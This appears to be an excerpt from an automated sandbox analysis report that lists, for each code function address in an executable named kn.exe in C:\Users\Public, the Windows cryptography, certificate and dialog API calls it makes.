                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFF7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,25_2_00007FF67DEFF7FC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE97E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,25_2_00007FF67DEE97E4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE717D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,25_2_00007FF67DE717D4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED37A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,25_2_00007FF67DED37A4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEEB794 CryptExportPublicKeyInfoEx,SetLastError,25_2_00007FF67DEEB794
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE4B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,25_2_00007FF67DE4B788
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,25_2_00007FF67DE6D790
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA577C #360,#358,CryptDecodeObject,GetLastError,#357,25_2_00007FF67DEA577C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9F774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,25_2_00007FF67DE9F774
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED5768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED5768
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFD750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,25_2_00007FF67DEFD750
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,25_2_00007FF67DE6B324
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBD30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,25_2_00007FF67DEBD30C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE6D304
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECF2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DECF2F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA92D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,25_2_00007FF67DEA92D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB32D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,25_2_00007FF67DEB32D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF093A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,25_2_00007FF67DF093A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE992C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,25_2_00007FF67DE992C4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9B2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,25_2_00007FF67DE9B2B4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED32A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,25_2_00007FF67DED32A8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF07290 NCryptIsKeyHandle,#359,#360,#357,#358,25_2_00007FF67DF07290
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFD28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,25_2_00007FF67DEFD28C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6D240 #357,CryptFindOIDInfo,#357,LocalFree,25_2_00007FF67DE6D240
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF07214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,25_2_00007FF67DF07214
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF071C8 BCryptDestroyKey,#360,25_2_00007FF67DF071C8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED11C8 NCryptVerifySignature,#205,#357,#357,#357,#357,25_2_00007FF67DED11C8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED31C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,25_2_00007FF67DED31C0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA51A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,25_2_00007FF67DEA51A4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB3188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,25_2_00007FF67DEB3188
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF07178 BCryptCloseAlgorithmProvider,#360,25_2_00007FF67DF07178
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBF168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,25_2_00007FF67DEBF168
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB5164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,25_2_00007FF67DEB5164
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE93504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,25_2_00007FF67DE93504
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED34F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,25_2_00007FF67DED34F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF014F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,25_2_00007FF67DF014F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEEB4EC CryptDecodeObjectEx,SetLastError,25_2_00007FF67DEEB4EC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFF4A0 CryptHashPublicKeyInfo,SetLastError,25_2_00007FF67DEFF4A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBF488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,25_2_00007FF67DEBF488
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED9480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED9480
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF29208 #357,NCryptEnumKeys,#360,#358,25_2_00007FF67DF29208
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEEB464 CryptEncodeObjectEx,SetLastError,25_2_00007FF67DEEB464
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE35438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,25_2_00007FF67DE35438
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,25_2_00007FF67DED342C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,25_2_00007FF67DF0141C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE913F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,25_2_00007FF67DE913F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB53E8 CryptEncodeObjectEx,GetLastError,#357,25_2_00007FF67DEB53E8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,25_2_00007FF67DEBB3D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE33B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,25_2_00007FF67DEE33B0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB33A0 CryptVerifyCertificateSignature,CertCompareCertificateName,25_2_00007FF67DEB33A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,25_2_00007FF67DF0739C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED3390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,25_2_00007FF67DED3390
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,25_2_00007FF67DE5B36C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,25_2_00007FF67DE8B350
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE95338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,25_2_00007FF67DE95338
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE67340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,25_2_00007FF67DE67340
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF06F2C NCryptExportKey,#360,25_2_00007FF67DF06F2C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE68F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,25_2_00007FF67DE68F1C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED0EF4 NCryptImportKey,#205,#359,#359,#357,25_2_00007FF67DED0EF4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF06EA8 NCryptImportKey,#360,25_2_00007FF67DF06EA8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFEE94 CryptSignMessage,SetLastError,25_2_00007FF67DEFEE94
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE70E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,25_2_00007FF67DE70E94
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA2E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,25_2_00007FF67DEA2E7C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED2E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,25_2_00007FF67DED2E6C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF06E48 NCryptSetProperty,#360,25_2_00007FF67DF06E48
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE60E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE60E24
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF06DE0 NCryptCreatePersistedKey,#360,25_2_00007FF67DF06DE0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB4DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,25_2_00007FF67DEB4DDC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED0DD4 NCryptGetProperty,#205,#359,#357,#359,#357,25_2_00007FF67DED0DD4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF8DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,25_2_00007FF67DEF8DD0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF02DAC #357,#357,CryptFindOIDInfo,LocalFree,25_2_00007FF67DF02DAC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED0D84 NCryptFreeObject,#205,#357,25_2_00007FF67DED0D84
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF06D78 NCryptOpenKey,#360,25_2_00007FF67DF06D78
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED2D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,25_2_00007FF67DED2D78
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE89134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,25_2_00007FF67DE89134
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF07124 BCryptGenerateKeyPair,#360,25_2_00007FF67DF07124
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,25_2_00007FF67DEF511C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED10D8 NCryptSetProperty,#205,#359,#357,#359,#357,25_2_00007FF67DED10D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED30D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,25_2_00007FF67DED30D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF070C8 BCryptSetProperty,#360,25_2_00007FF67DF070C8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF20DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,25_2_00007FF67DF20DB8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEDB0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DEDB0A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9B098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,25_2_00007FF67DE9B098
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,25_2_00007FF67DE7107C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0705C BCryptGetProperty,#360,25_2_00007FF67DF0705C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED1058 NCryptOpenStorageProvider,#205,#359,#357,25_2_00007FF67DED1058
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE4302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,25_2_00007FF67DE4302F
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE47034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,25_2_00007FF67DE47034
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC9028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,25_2_00007FF67DEC9028
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED7020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED7020
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,25_2_00007FF67DED301C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF14E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,25_2_00007FF67DF14E58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0700C BCryptEnumAlgorithms,#360,25_2_00007FF67DF0700C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED0FB4 NCryptOpenKey,#205,#359,#357,#357,25_2_00007FF67DED0FB4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF06FAC BCryptOpenAlgorithmProvider,#360,25_2_00007FF67DF06FAC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF30ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,25_2_00007FF67DF30ED0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE64F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,25_2_00007FF67DE64F90
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFEF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,25_2_00007FF67DEFEF74
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,25_2_00007FF67DEC0F58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB4F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,25_2_00007FF67DEB4F50
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF3EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,25_2_00007FF67DF3EB38
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC8AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,25_2_00007FF67DEC8AFC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE72B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,25_2_00007FF67DE72B00
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED2AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,25_2_00007FF67DED2AE4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED0ABC BCryptVerifySignature,#205,#357,#357,#357,#357,25_2_00007FF67DED0ABC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED8AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED8AA0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF02A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,25_2_00007FF67DF02A78
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE46A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,25_2_00007FF67DE46A84
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,25_2_00007FF67DEBEA7C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB4A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,25_2_00007FF67DEB4A34
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,25_2_00007FF67DED4A1C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED0A18 BCryptSetProperty,#205,#359,#357,#357,25_2_00007FF67DED0A18
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF08C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,25_2_00007FF67DF08C58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBAA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,25_2_00007FF67DEBAA00
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,25_2_00007FF67DE9E9F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF14C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,25_2_00007FF67DF14C80
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE929A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,25_2_00007FF67DE929A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED099C BCryptOpenAlgorithmProvider,#205,#359,#359,25_2_00007FF67DED099C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF02994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,25_2_00007FF67DF02994
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF28CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,25_2_00007FF67DF28CF4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,25_2_00007FF67DE5C960
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED8940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED8940
